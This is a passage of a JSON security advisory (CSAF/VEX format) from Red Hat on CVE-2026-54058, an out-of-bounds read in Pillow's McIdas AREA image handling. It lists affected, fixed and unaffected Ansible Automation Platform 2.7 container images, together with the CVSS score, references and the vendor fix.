"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500057"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow prior to 12.3.0. When an uncompressed McIdas AREA image is loaded from a filename through the mmap raw codec path, attacker-controlled header words can set a row stride smaller than the natural row width. Pixel access such as Image.tobytes(), getpixel, convert, or save can then read beyond the mapped region, disclosing adjacent process memory or causing a fault.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Memory disclosure or denial of service via crafted McIdas AREA image",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Pillow is vulnerable to an out-of-bounds read when processing a crafted uncompressed McIdas AREA image via the mmap raw codec. A remote attacker who can supply such an image to a service that loads it without user interaction may disclose adjacent process memory or trigger a denial of service. Fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54058"
},
{
"category": "external",
"summary": "RHBZ#2500057",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500057"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54058"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54058",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54058"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/6a8de891fb00968e5ea79bfa84368ed90b3cfc1d",
"url": "https://github.com/python-pillow/Pillow/commit/6a8de891fb00968e5ea79bfa84368ed90b3cfc1d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9719",
"url": "https://github.com/python-pillow/Pillow/pull/9719"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-62p4-gmf7-7g93",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-62p4-gmf7-7g93"
}
],
"release_date": "2026-07-14T16:27:38.050000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
